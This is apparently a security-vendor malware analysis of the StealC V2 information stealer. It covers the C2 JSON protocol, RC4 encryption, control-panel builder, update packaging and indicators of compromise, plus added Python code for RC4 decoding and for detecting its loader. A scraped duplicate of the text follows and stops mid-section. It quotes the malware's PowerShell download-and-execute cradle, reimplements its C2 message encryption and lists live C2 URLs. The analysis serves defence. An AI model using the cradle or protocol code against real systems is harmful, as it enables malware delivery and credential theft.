Introduction

StealC is a popular information stealer and malware downloader that has been sold since January 2023. In March 2025, StealC version 2 (V2) was introduced with key updates, including a streamlined command-and-control (C2) communication protocol and, in the latest variants, RC4 encryption of C2 traffic. The payload delivery options have been expanded to include Microsoft Software Installer (MSI) packages and PowerShell scripts. A redesigned control panel provides an integrated builder that enables threat actors to customize payload delivery rules based on geolocation, hardware ID (HWID), and installed software. Additional features include multi-monitor screenshot capture, a unified file grabber, and server-side brute-forcing of credentials.

This blog post focuses on the recent changes in StealC V2: the improvements in payload delivery, encryption, control panel functionality, and the updated communication protocol.

Key Takeaways

- StealC V2, introduced in March 2025, uses a JSON-based network protocol, with RC4 encryption added in recent variants.
- StealC V2 now supports loader options that deliver Microsoft Software Installer (MSI) packages and PowerShell scripts in addition to executables.
- The redesigned control panel includes an embedded builder that allows operators to customize payload rules and bot responses based on geolocation, HWID, and installed software.
- StealC V2 includes multi-monitor screenshot capture and a unified file grabber that targets crypto wallets, gaming applications, instant messengers, email clients, VPNs, and browsers. It also supports server-side brute-forcing for credential harvesting.
- ThreatLabz has observed StealC V2 being deployed via Amadey and, conversely, StealC V2 being used to distribute Amadey.

Technical Analysis

A thorough technical analysis of StealC V2 was published by another researcher.
The following sections add technical details that complement that prior open source reporting.

Like StealC V1, many StealC V2 samples are packed with Themida, a commercial code protection tool designed to hinder reverse engineering. The malware also obfuscates nearly all the strings it uses during execution and employs a two-stage deobfuscation process, as StealC V1 did.

The following matrix compares the features available in StealC V1 and StealC V2.

| Feature | StealC Version 1 | StealC Version 2 |
|---|---|---|
| Anti-VM checks | Yes | No |
| Supports specifying a custom port or using HTTPS | Yes | No |
| Establishes persistence | No | No |
| Downloads third-party DLLs from the C2 server | Yes | No |
| Executes DLL payloads | Yes | No |
| Executes EXE payloads | Yes | Yes |
| Executes MSI payloads | No | Yes |
| Executes PowerShell script payloads | No | Yes |
| Compiled for x64 architectures | No | Yes |
| Uses RC4 encryption for network communications | No | Yes (implemented in 2.1.1) |
| Decrypts stolen data server-side | No | Yes |
| Supports Chrome v20 application-bound encryption | No | Yes |
| Victim screenshot capture with multi-monitor support | No | Yes |
| Unified file grabber | No | Yes |
| Streamlined control panel with an integrated builder | No | Yes |

Table 1: A matrix comparing features available in StealC V1 and StealC V2.

During initial execution, StealC V2 decrypts its important strings with a hardcoded RC4 key, along with an expiration date and the information required for API resolution. If the current date is past the expiration date, the malware terminates. The strings are stored Base64-encoded and decrypted with RC4 under a unique hardcoded key. Although the hardcoded key varies between samples, the builder integrated into the control panel does not change this RC4 key.
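The block below is an added example written for this page; it is not StealC code and not ThreatLabz tooling. It implements the standard RC4 routine the page says StealC V2 uses and applies it the two ways described here and in the protocol section below: decoding a Base64-wrapped string table entry under the string key, and wrapping a C2 response under a fixed network key with a random hexadecimal key/value pair placed first. The keys, the sample field values and the assumption that raw RC4 output goes on the wire are all constructed for the example. The last two functions show the practitioner's caveat: the random pair makes each ciphertext different, but because the key is fixed the keystream is not, so one known plaintext (a response whose fields you already know) recovers the keystream for every other message of the same length, and the constant leading bytes of the JSON still encrypt to the same bytes each time.

```python
import base64
import json
import os


def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# String table entries are stored as Base64(RC4(string_key, plaintext)).
def obfuscate_string(string_key: bytes, text: str) -> str:
    return base64.b64encode(rc4(string_key, text.encode())).decode()


def deobfuscate_string(string_key: bytes, blob: str) -> str:
    return rc4(string_key, base64.b64decode(blob)).decode()


HEX = set("0123456789abcdef")


def is_random_pair_key(name: str) -> bool:
    """Assumption: the random pair is the only field whose name is 10-15 lowercase hex chars."""
    return 10 <= len(name) <= 15 and set(name) <= HEX


def build_response(fields: dict) -> bytes:
    """Serialize a C2 response with the random hex key/value pair placed first."""
    rnd_name = os.urandom(8).hex()[:15]        # 15 lowercase hex chars, within the 10-15 range
    rnd_value = os.urandom(8).hex()[:15]
    msg = {rnd_name: rnd_value, **fields}      # dict order is preserved, so the pair leads
    return json.dumps(msg, separators=(",", ":")).encode()


def encrypt_response(net_key: bytes, fields: dict) -> bytes:
    # Assumption: raw RC4 output on the wire; the page describes no further encoding.
    return rc4(net_key, build_response(fields))


def decrypt_response(net_key: bytes, blob: bytes) -> dict:
    msg = json.loads(rc4(net_key, blob))
    return {k: v for k, v in msg.items() if not is_random_pair_key(k)}


def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """A fixed RC4 key emits the same keystream every time, so one known message exposes it."""
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))


def xor_with_keystream(keystream: bytes, data: bytes) -> bytes:
    if len(data) > len(keystream):
        raise ValueError("keystream shorter than message")
    return bytes(c ^ k for c, k in zip(data, keystream))


def demo() -> dict:
    string_key = b"example-string-key"      # constructed; real keys are per build
    net_key = b"example-network-key"        # constructed; real keys are per build
    fields = {"opcode": "success", "access_token": "f066fcda843438", "self_delete": 1,
              "take_screenshot": 1, "loader": 0, "steal_steam": 0, "steal_outlook": 1,
              "browsers": [], "plugins": [], "files": []}
    c1 = encrypt_response(net_key, fields)
    c2 = encrypt_response(net_key, fields)
    # An analyst who knows the plaintext of c1 gets the keystream without the key.
    keystream = recover_keystream(c1, rc4(net_key, c1))
    return {
        "string_roundtrip": deobfuscate_string(string_key, obfuscate_string(string_key, "winhttp.dll")),
        "ciphertexts_differ": c1 != c2,            # the random pair gives variability
        "leading_bytes_equal": c1[:2] == c2[:2],   # but '{"' under one keystream is constant
        "decrypted": decrypt_response(net_key, c1),
        "second_message_via_keystream": json.loads(xor_with_keystream(keystream, c2)),
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Because both the random name and value are fixed at 15 characters in this example, every response has the same length and the recovered keystream covers the second message completely; with variable 10-15 character lengths the recovered prefix still decrypts everything up to the shortest known message.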
Key changes are handled by the StealC V2 support team on behalf of their clients, as discussed in the Updates section below.

StealC V2 performs several validation steps in addition to the expiration check: it ensures no duplicate instance is running, and it exits if the system language is one spoken in the Commonwealth of Independent States (CIS). At this point, the second deobfuscation routine runs, decoding configuration strings such as the host and URL path of the C2 server, along with the additional DLL and function names for the APIs resolved later during execution. Those API functions are contained in the following DLLs:

- kernel32.dll
- advapi32.dll
- gdiplus.dll
- crypt32.dll
- gdi32.dll
- rstrtmgr.dll
- ole32.dll
- winhttp.dll
- user32.dll
- shlwapi.dll
- shell32.dll
- ntdll.dll
- nss3.dll
- wininet.dll

Notably, unlike V1, StealC V2 contains no strings related to virtual machine environments. StealC V2 also no longer requests third-party DLLs from the C2 server for its information-stealing functionality.

New features

StealC V1 could execute EXE and DLL files. StealC V2 now downloads and executes payloads in three formats: executable (EXE) files, Microsoft Software Installer (MSI) packages, and PowerShell scripts. Depending on the loader configuration parameter provided by the C2 server in the initial response, this functionality is triggered either before or after the data-stealing functions. The table below describes how each payload type is executed.

| Payload Type | Execution Method |
|---|---|
| EXE files | Executed with the Windows API function ShellExecuteEx, with up to 10 retry attempts if execution fails. |
| MSI files | Installed with msiexec.exe using the /passive parameter (unattended mode: a progress bar and no prompts, so minimal user interaction). The malware retries up to 10 times if installation fails. |
| PowerShell scripts | Executes a remote PowerShell script via the command powershell.exe -nop -c iex(New-Object Net.WebClient).DownloadString('[payload]'). If execution fails, no retries are attempted. |

Table 2: New payload execution types supported by StealC V2.

RC4 encryption

Interestingly, the RC4 encryption functionality was initially commented out in early versions of StealC V2. The most recent update has enabled it, indicating that the malware is under active development.

Updated network communication protocol

StealC V2 uses standard JSON-based requests and responses for its C2 communication. The figure below illustrates the workflow of the C2 communication process.

Figure 1: StealC V2's communications workflow.

Request

The C2 server accepts four operation types: create, upload_file, done, and loader. The create operation is always the first request and registers the infection. The initial request always contains the bot ID (hwid) and the botnet ID (build), as shown in the example below.

{
  "build": "main1",
  "hwid": "A9CAA24C-E7F3-3B20-0F54-4BE8A7DC2330",
  "type": "create"
}

The HWID is derived from the volume serial number of the system drive letter (C: by default) and consists of 32 hexadecimal characters laid out in UUID form (8-4-4-4-12 groups). The value does not necessarily carry a version-4 marker despite that resemblance: in the example above the third group starts with 3, so detection logic should match the hex layout rather than assume a strict UUIDv4.

Response

The response from the C2 server contains the elements that define the malware's behavior and tasks. It includes the access_token, which the malware uses for all subsequent requests, as well as flags that specify target configurations: browser settings for data theft, crypto plugins to search for and exfiltrate, and files to target (e.g., cryptocurrency wallets, Steam, Outlook). The Steam and Outlook paths are hardcoded into the binary, and their data is exfiltrated if the corresponding flags are enabled.

One notable feature of the C2 server's response is a random key/value pair that adds variability to each message. The value is a string of 10 to 15 lowercase hexadecimal characters (e.g., c689cbd9ecfa3cc in the example below), and the key in the example, 8b31887be2030b7, is of the same form. Because the same RC4 key is reused for every message, this random pair is what makes each encrypted response differ from the last; its purpose is to defeat static signatures on the responses. Note that this is variability rather than a nonce: RC4 with a fixed key produces the same keystream for every message, so the random field only changes the plaintext, and a known plaintext for one response still recovers the keystream for all others.

An example response is shown below:

{
  "8b31887be2030b7": "c689cbd9ecfa3cc",
  "opcode": "success",
  "access_token": "f066fcda843438[..]f666733c11901ae74102df",
  "self_delete": 1,
  "take_screenshot": 1,
  "loader": 0,
  "steal_steam": 0,
  "steal_outlook": 1,
  "browsers": [],
  "plugins": [],
  "files": []
}

Each response contains an opcode field that indicates the result of the request, such as success, blocked, error, or unknown; these are described next.

Based on the panel files, a StealC V2 server returns specific error codes when it detects a malformed or unexpected request. By comparison, a StealC V1 server responded with an empty message, a block notification, or by terminating the connection. The following table lists the StealC V2 error codes and the conditions that trigger them.

| Request | Explanation | Response |
|---|---|---|
| Any request | Malformed message (not JSON compliant) | {"opcode": "error", "code": "1000"} |
| Any request | Unknown packet (unknown type parameter) | {"opcode": "unknown"} |
| Any request | Empty or missing parameter | {"opcode": "error"} |
| Any request | Unencrypted message (after version 2.0.1) | {"opcode": "block"} |
| upload_file, done, loader | Empty access token | {"opcode": "error5"} |
| upload_file | filename or data parameter missing | {"opcode": "error4"} |
| upload_file, done, loader | Malformed or unknown access token | {"opcode": "error1"} |
| upload_file | File already sent by the bot | {"opcode": "error3"} |
| upload_file | Server could not store the file | {"opcode": "error2"} |
| create | Empty or missing parameter | {"opcode": "error"} |
| create | Communication process already finished, or blocked IP | {"opcode": "blocked"} |
| create | Unable to register bot | {"opcode": "error"} |

Table 3: Error codes sent by the StealC V2 C2 server when an unexpected or malformed request is received.

Control panel and builder

ThreatLabz analyzed a StealC V2 C2 panel with an embedded builder, shown in the figure below.

Figure 2: The StealC V2 control panel dashboard provides a summary of infection activity and stolen information.

ThreatLabz's in-depth analysis of StealC V2's infrastructure revealed several key findings:

- Version control enforcement: The builder requires a version update, delivered as a ZIP archive, to be uploaded via the framework's admin settings. This ensures that operators cannot install a version older than the most recently applied update.
- Telegram bot integration: The control panel supports a Telegram bot for sending notifications and allows customization of the message format.
- Rule-based payload delivery: Payload delivery depends on rules created by the operator, such as bot geolocation, build IDs, triggered markers, or software/processes identified during the information-gathering phase. These rules dictate how payload responses are generated.
- Ongoing development: The panel is evolving rapidly, with partially implemented features such as Firefox plugin loading. As noted above, RC4 encryption for network communication was initially commented out; the recently released update (version 2.2.0) enabled it.
- Endpoint file handling: The control panel endpoint supports file-based uploads (e.g., multipart/form-data) as StealC V1 did, but now exclusively processes upload_file commands.
- IP- and HWID-based blocking: The panel allows operators to block communications by IP address (or IP mask) and by specific HWID. Additionally, an IP address can be automatically blocked for the remainder of the day after it completes the communication process.
- Fake 404 error for C2 discovery evasion: Early versions of the panel served fake 404 Not Found pages. A researcher noticed that this fake response could be used to fingerprint StealC V2 servers, and newer updates reportedly patched this behavior.
- Basic RC4 implementation: Despite the first StealC V2 advertisement claiming a custom RC4 algorithm, the implementation used is standard RC4.

The StealC V2 builder is embedded into the control panel interface, enabling operators to define loader rules, grabber rules, and markers (wildcards that trigger when the contents of the stolen password or cookie files match) for stolen data.
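The loader rules above decide which URL the C2 hands back; on the endpoint, what telemetry sees is one of the three execution methods from Table 2. The block below is an added example for this page (not ThreatLabz or Zscaler detection content): per-event rules for the exact PowerShell download cradle and for msiexec /passive runs, plus a second signal that the page's retry behaviour makes possible, a burst of identical command lines from one parent within a short window (StealC retries EXE and MSI launches up to 10 times but never retries the PowerShell cradle). The events, paths, PIDs and URL are constructed Sysmon-like records, not real logs, and the 60-second window and threshold of 3 are tuning choices, not values from the page.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation events in a Sysmon-like shape (not real telemetry):
# (utc_time, parent_pid, image, command_line). Paths, PIDs and the URL are placeholders.
EVENTS = [
    ("2025-05-02T10:00:01", 4120, r"C:\Windows\System32\msiexec.exe",
     r"msiexec.exe /i C:\Users\victim\AppData\Local\Temp\a1b2.msi /passive"),
    ("2025-05-02T10:00:04", 4120, r"C:\Windows\System32\msiexec.exe",
     r"msiexec.exe /i C:\Users\victim\AppData\Local\Temp\a1b2.msi /passive"),
    ("2025-05-02T10:00:07", 4120, r"C:\Windows\System32\msiexec.exe",
     r"msiexec.exe /i C:\Users\victim\AppData\Local\Temp\a1b2.msi /passive"),
    ("2025-05-02T10:00:09", 4120, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -c iex(New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"),
    ("2025-05-02T11:30:00", 900, r"C:\Windows\System32\msiexec.exe",
     r'msiexec.exe /i "C:\Program Files\Vendor\app.msi" /passive'),
    ("2025-05-02T11:31:00", 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"),
]

# The cradle quoted in Table 2: -nop -c iex(New-Object Net.WebClient).DownloadString('...')
PS_CRADLE = re.compile(
    r"-nop\b.*\s-c\s.*\biex\s*\(\s*New-Object\s+Net\.WebClient\s*\)\s*\.DownloadString\s*\(",
    re.IGNORECASE)
# MSI package argument that is a URL or lives in a user-writable temp directory.
UNTRUSTED_SOURCE = re.compile(r"https?://|\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.IGNORECASE)
RETRY_WINDOW = timedelta(seconds=60)   # tuning choice for this example
RETRY_MIN = 3                          # tuning choice for this example


def classify(image: str, cmdline: str):
    """Per-event rules; returns (rule, confidence) or None."""
    name = image.rsplit("\\", 1)[-1].lower()
    if name == "powershell.exe" and PS_CRADLE.search(cmdline):
        return ("stealc_powershell_cradle", "high")
    if name == "msiexec.exe" and "/passive" in cmdline.lower():
        if UNTRUSTED_SOURCE.search(cmdline):
            return ("msiexec_passive_untrusted_source", "high")
        return ("msiexec_passive", "low")   # /passive alone is common in legitimate deployments
    return None


def retry_bursts(events):
    """Index of the first event in each run of >= RETRY_MIN identical command lines
    launched by one parent inside RETRY_WINDOW (StealC's up-to-10 retries for EXE/MSI)."""
    groups = defaultdict(list)
    for idx, (ts, ppid, _, cmdline) in enumerate(events):
        key = (ppid, " ".join(cmdline.lower().split()))   # normalize whitespace and case
        groups[key].append((datetime.fromisoformat(ts), idx))
    bursts = []
    for hits in groups.values():
        hits.sort()
        for start, (t0, idx0) in enumerate(hits):
            run = [i for t, i in hits[start:] if t - t0 <= RETRY_WINDOW]
            if len(run) >= RETRY_MIN:
                bursts.append(idx0)
                break
    return bursts


def detect(events):
    """Combine both rule families into one list of (event_index, rule, confidence)."""
    findings = []
    for idx, (_, _, image, cmdline) in enumerate(events):
        hit = classify(image, cmdline)
        if hit:
            findings.append((idx, hit[0], hit[1]))
    for idx in retry_bursts(events):
        findings.append((idx, "retry_burst", "medium"))
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

The ShellExecuteEx path for EXE payloads has no distinctive command line of its own, so the retry-burst rule is the only one of the three that catches it here; in practice pair it with parent-process and file-origin context from the same telemetry.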
As an illustration, the threat actor could create a marker that searches for strings containing coinbase.com in the contents of the exfiltrated password and cookie files, as shown below.

Figure 3: StealC V2 marker rule that searches for coinbase.com.

The actor can then create a loader rule that triggers when the marker matches. If the victim's files contain the marker's search term, the C2 answers the loader request with the triggered loader's URL, as shown in the figure below.

Figure 4: StealC V2 loader rule creation that triggers when the Coinbase marker matches.

These custom configurations are automatically merged with a build template file, which is a pre-configured StealC V2 binary. The builder only modifies the build parameter of the template, leaving the build_id parameter in plaintext and set to the default value across all templates. Important elements such as the RC4 key, C2 address, and URL path are managed exclusively by the StealC V2 development team. Note that StealC V2 currently only supports HTTP communication on port 80.

Updates

The figure below shows the update interface in StealC V2's control panel.

Figure 5: StealC V2's panel and builder update menu (with two updates applied).

After the StealC V2 control panel is set up, the installer script instructs the operator to contact support (the StealC seller) and send the control panel domain, the path for network communication, and the RC4 key created at install time. After receiving these parameters, the seller creates an update containing a builder template binary configured with the parameters from the installation script. Once the operator receives the builder template, they can use the control panel to create new StealC builds.

The update file is packaged as a ZIP archive containing the following components:

- version.json: JSON file used by the panel to identify and install the update.
- build.exe: StealC V2 template binary.
- Optional patch files: Additional files that replace specific existing files in the panel during the update process, delivering new functionality or fixes.

The example below shows the contents of a version.json file. The panel reads this file to identify and apply the changes included in the update.

{
  "version": "2.2.4",
  "admin_update": true,
  "gate_update": true,
  "db_update": false,
  "changes": [
    {"type": "gate", "description": "Fix build block requests v2"}
  ]
}

The table below describes the fields of the version.json file:

| Field | Description |
|---|---|
| version | The StealC V2 bot version. |
| admin_update | Flag instructing the updater to apply patches to the admin folder structure. |
| gate_update | Flag instructing the updater to apply patches to the gate folder structure. |
| changes | List of update messages describing the modifications, displayed within the panel. |
| db_update | Indicates updates or modifications to the panel's database model (MySQL). |

Table 4: Parameters present in StealC V2's update configuration file.

Comparing StealC builds

After examining the builder templates included in the C2 panel, we compared different versions and identified key improvements in their development. The table below highlights the evolution of StealC across versions:

| Template Version | Update File | Description |
|---|---|---|
| 2.0.1 | update.stealc_update | No obfuscation; all strings are stored in plaintext. Only a subset of API functions are resolved. No RC4 keys. Uses winhttp.dll APIs for communication. Configuration parameters are hardcoded. |
| 2.0.1 | 2.0.0.stealc_update | Implemented obfuscation. Added an RC4 key to decrypt the malware's strings. All API functions are resolved at runtime. Features a distinct structure that sets it apart from other versions. Encrypts configuration parameters using RC4. |
| 2.1.1 | 2.1.1.stealc_update | Features a code structure similar to more recent samples. First version using encryption/decryption routines for network communication, with a single RC4 key that is also used for decrypting the malware's strings. |
| 2.1.3 | 2.1.2.stealc_update | Identical to version 2.1.1. |
| 2.2.4 | 2.0.1.stealc_update | Includes one RC4 key for string decryption and another RC4 key for network encryption. Improved payload download (based on winhttp.dll instead of wininet.dll). Added the autodelete command. |

Table 5: Differences among the StealC V2 bot templates present in several update files.

Additionally, the latest version includes a self-delete routine, triggered by the self_delete configuration flag received from the C2 server, which closely resembles the routine StealC V1 used to erase the downloaded DLLs.

Conclusion

StealC V2 introduces improvements such as enhanced payload delivery, a streamlined communications protocol with encryption, and a redesigned control panel that provides more targeted information collection. StealC V2 is frequently used in conjunction with other malware families such as Amadey. ThreatLabz is continuing to track updates to StealC V2 and adding coverage to protect our customers.

Zscaler Coverage

Zscaler's multilayered cloud security platform detects indicators related to the new variant of StealC V2 at various levels. The figure below depicts the Zscaler Cloud Sandbox, showing detection details for StealC V2.

Figure 6: Zscaler sandbox report for StealC V2.

In addition to sandbox detections, the platform detects indicators related to StealC with the following threat names:

- Win64.PWS.Stealc
- Win32.PWS.Stealc
- Win64.PWS.Amadey
- Win32.PWS.Amadey

Indicators Of Compromise (IOCs)

| Indicator | Description |
|---|---|
| 0b921636568ee3e1f8ce71ff9c931da5675089ba796b65a6b212440425d63c8c | Packed sample (with Themida) SHA256 (StealC V2) |
| e205646761f59f23d5c8a8483f8a03a313d3b435b302d3a37061840b5cc084c3 | Packed sample (with Themida) SHA256 (StealC V2) |
| a1b2aecdd1b37e0c7836f5c254398250363ea74013700d9a812c98269752f385 | Unpacked sample SHA256 (StealC V2) |
| 27c77167584ce803317eab2eb5db5963e9dfa86450237195f5723185361510dc | Unpacked sample SHA256 (StealC V2) |
| dd36c7d50cb05761391a7f65932193ec847d34f8ba1bb2f2a43ecf4985d911f4 | Dropped payload SHA256 (Amadey) |
| 87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f | Malware dropping StealC V2 SHA256 (Amadey) |
| http://45.93.20[.]64/c090b39aa5004512.php | StealC V2 C2 server |
| http://45.93.20[.]28/3d15e67552d448ff.php | StealC V2 C2 server |
| http://88.214.48[.]93/ea2cb15d61cc476f.php | StealC V2 C2 server |
[#item_full_content] [[{“value”:”IntroductionStealC is a popular information stealer and malware downloader that has been sold since January 2023. In March 2025, StealC version 2 (V2) was introduced with key updates, including a streamlined command-and-control (C2) communication protocol and the addition of RC4 encryption (in the latest variants). The malware’s payload delivery options have been expanded to include Microsoft Software Installer (MSI) packages and PowerShell scripts. A redesigned control panel provides an integrated builder that enables threat actors to customize payload delivery rules based on geolocation, hardware IDs (HWID), and installed software. Additional features include multi-monitor screenshot capture, a unified file grabber, and server-side brute-forcing for credentials.This blog post focuses on the recent changes in StealC V2, describing the improvements in payload delivery, encryption, control panel functionality, and the updated communication protocol.Key TakeawaysStealC V2, introduced in March 2025, utilizes a JSON-based network protocol with RC4 encryption implemented in recent variants.StealC V2 now supports loader options that can deliver Microsoft Software Installer (MSI) packages, and PowerShell scripts.The redesigned control panel includes an embedded builder that allows operators to customize payload rules and bot responses based on geolocation, HWID, and installed software.StealC V2 includes multi-monitor screenshot capture and a unified file grabber that targets crypto wallets, gaming applications, instant messengers, email clients, VPNs, and browsers. In addition, StealC V2 supports server-side brute-forcing capabilities for credential harvesting.ThreatLabz has observed StealC V2 being deployed via Amadey, and conversely, it being used to distribute StealC V2.Technical AnalysisA thorough technical analysis of StealC V2 was published by another researcher. 
However, in the following sections, we delve into additional technical information that complements prior open source reportingSimilar to StealC V1, many StealC V2 samples are packed using Themida, a commercial code protection tool, which is designed to hinder reverse engineering. Additionally, the malware obfuscates nearly all the strings it uses during execution and employs a two-stage deobfuscation process, which was also observed in StealC V1.The following matrix shows a comparison between features available in StealC V1 and StealC V2. StealC Version 1StealC Version 2Anti-VM checksYesNoSupports specifying a custom port or using HTTPSYesNoEstablishes persistenceNoNoDownloads third-party DLLs from the C2 serverYesNoExecutes DLL payloads YesNoExecutes EXE payloadsYesYesExecutes MSI files payloadsNoYesExecutes PowerShell script payloadsNoYesCompiled for x64 architecturesNoYesUses RC4 encryption for network communicationsNoYes (implemented in 2.1.1)Decrypts stolen data server-sideNoYesSupports Chrome v20 application bound encryptionNoYesEnables victim screenshot capture with multi-monitor supportNoYesSupports unified file grabber functionalityNoYesStreamlines and improves the control panel with an integrated builderNoYesTable 1: A matrix comparing features available in StealC V1 and StealC V2.During the initial execution, StealC V2 decrypts important strings using a hardcoded RC4 key, along with an expiration date and information required for API resolution. If the current date is past the expiration date, the malware will terminate itself. The malware’s strings are stored in Base64 format and decrypted using RC4 encryption with a unique hardcoded key. Although the hardcoded keys may vary between samples, the builder integrated into the control panel does not change this RC4 key. 
Instead, the StealC V2 support team manages key updates for their clients as we will discuss later.StealC V2 performs several validation steps in addition to the expiration date, including ensuring no duplicate instances are running, and the system language cannot be a language spoken in the Commonwealth of Independent States (CIS). At this point, the second deobfuscation routine takes place, decoding configuration strings such as the host and URL path of the C2 server, along with additional API DLLs and function names for future use during execution.Those API functions are contained in the DLLs below:kernel32.dlladvapi32.dllgdiplus.dllcrypt32.dllgdi32.dllrstrtmgr.dllole32.dllwinhttp.dlluser32.dllshlwapi.dllshell32.dllntdll.dllnss3.dllwininet.dllNotably, unlike V1, StealC V2 does not include strings related to virtual machine environments. StealC V2 also no longer makes requests to the C2 server to download third-party DLLs that were required for information stealing functionality.New featuresStealC V1 was capable of executing EXE and DLL files. StealC V2 now supports downloading and executing payloads in three formats: executable (EXE) files, Microsoft Software Installer (MSI) packages, and PowerShell scripts. Depending on the loader configuration parameter provided by the C2 server in the initial response, this functionality can be triggered either before or after the data-stealing functions. The table below describes how each payload is executed.Payload TypeExecution MethodEXE filesExecuted using the Windows API function ShellExecuteEx with up to 10 retry attempts if execution fails.MSI filesInstalled using msiexec.exe with the silent /passive parameter, allowing for minimal user interaction. The malware retries up to 10 times if installation fails.PowerShell scriptsExecutes a remote PowerShell script via the command powershell.exe -nop -c iex(New-Object Net.WebClient).DownloadString(‘[payload]’). 
If the execution fails, no retries are attempted.Table 2: New payload execution types supported by StealC V2.RC4 encryptionInterestingly, the RC4 encryption functionality was initially commented out in early versions of StealC V2. The most recent update has enabled RC4 encryption, indicating that malware is under active development.Updated network communication protocolStealC V2 utilizes standard JSON-based requests and responses for its C2 communication. The figure below illustrates the workflow of the C2 communication process. Figure 1: Shows StealC V2’s communications workflow.RequestThe C2 server accepts four operation types: create, upload_file, done, and loader. The create operation is always the first request, which registers the infection. The initial request always contains a bot ID (HWID) and the botnet ID (build), as shown in the example below.{
build: “main1”,
hwid: “A9CAA24C-E7F3-3B20-0F54-4BE8A7DC2330”,
type: “create”
}The HWID creation is based on the volume serial number from the system’s drive letter (or C: by default) and consists of 32 hexadecimal characters in a UUIDv4 format. ResponseThe response from the C2 server contains essential elements that define the malware’s behavior and operational tasks. It includes the access_token, which the malware uses for all subsequent requests, as well as flags that specify target configurations, such as browser settings for data theft, crypto plugins for search and exfiltration, and files to target (e.g., cryptocurrency wallets, Steam, Outlook). Steam and Outlook paths are hardcoded into the binary, and their data is exfiltrated if the corresponding flags are enabled.One notable feature in the C2 server’s response is the inclusion of a random parameter, which adds variability to each message. This string consists of hexadecimal characters and ranges from 10 to 15 hexadecimal lowercase characters in length (e.g., c689cbd9ecfa3cc in the example below). This random key-value pair plays a critical role for RC4 encrypted messages that ensures that each message is unique (even though the same encryption key is repeatedly used). This technique is used to avoid static signatures for the responses.An example response is shown below:{
8b31887be2030b7: “c689cbd9ecfa3cc”,
opcode: “success”,
access_token: “f066fcda843438[..]f666733c11901ae74102df”,
self_delete: 1,
take_screenshot: 1,
loader: 0,
steal_steam: 0,
steal_outlook: 1,
browsers: [],
plugins: [],
files: []
}Each response contains an opcode field that indicates the result of the request, such as success, blocked, error, or unknown, which are described in the next section.Based on the panel files, a StealC V2 server generates specific error codes when it detects malformed or unexpected requests. By comparison, a StealC V1 server responded with an empty message, a block notification, or terminated the connection. The following table outlines the StealC V2 error codes and the conditions under which they are triggered.RequestExplanationResponseAny requestMalformed message (not JSON compliant){“opcode”: “error”, “code”: “1000”}Any requestUnknown packet (unknown type parameter){“opcode”: “unknown”}Any requestEmpty parameter or not present{“opcode”: “error”}Any requestUnencrypted message (after version 2.0.1){“opcode”: “block”}upload_file request, done request, loader requestEmpty access token{“opcode”: “error5”}upload_file requestFilename or data parameters not present{“opcode”: “error4”}upload_file request, done request, loader requestMalformed or unknown access token{“opcode”: “error1”}upload_file requestFile was already sent by the bot{“opcode”: “error3”}upload_file requestServer couldn’t store file{“opcode”: “error2”}create requestEmpty parameter or not present{“opcode”: “error”}create requestAlready finished communication process or blocked IP{“opcode”: “blocked”}create requestUnable to register bot{“opcode”: “error”}Table 3: Error codes sent by the StealC V2 C2 server when an unexpected or malformed request is received.Control panel and builderThreatLabz analyzed a StealC V2 C2 panel with an embedded builder as shown in the figure below.Figure 2: The StealC V2 control panel dashboard provides a summary of infection activity and stolen information.ThreatLabz’s in-depth analysis of StealC V2’s infrastructure revealed several key findings:Version control enforcement: The builder requires a version update that is provided in a ZIP archive to be uploaded via the 
framework’s admin settings. This ensures that operators cannot install older versions than the most recently applied update.Telegram bot integration: The control panel supports Telegram bot integration for sending notifications and allows customization of message formats.Rule-based payload delivery: Payload delivery depends on rules created by the operator, such as bot geolocation, build IDs, markers triggered, or identified software/processes during the information-gathering phase. These rules dictate how payload responses are generated.Ongoing development: The panel is rapidly evolving, with partially implemented features like Firefox plugin loading. As previously mentioned RC4 encryption for network communication was initially commented-out. The recently released update (version 2.2.0) enabled RC4 encryption for network communications.Endpoint file handling: The control panel endpoint supports file-based uploads (e.g., multipart/form-data) similar to StealC V1 but now exclusively processes upload_file commands.IP and HWID-based blocking: The panel allows operators to block communications based on IP addresses (or IP masks) and specific HWIDs. Additionally, IP addresses can be automatically blocked for the remainder of the day after completing the communication process.Fake 404 error for C2 discovery evasion: Early versions of the panel served fake 404 Not Found pages. However, a researcher noticed this fake response could be used to easily detect StealC V2 servers, and newer updates reportedly patched this behavior.Basic RC4 implementation: Despite the first StealC V2 advertisement claiming to implement a custom RC4 algorithm, the RC4 implementation used is standard.The StealC V2 builder is embedded into the control panel interface, enabling operators to define loader rules, grabber rules, and markers (markers consist of wildcards that will be triggered if the content of the stolen passwords or cookies files match) for stolen data. 
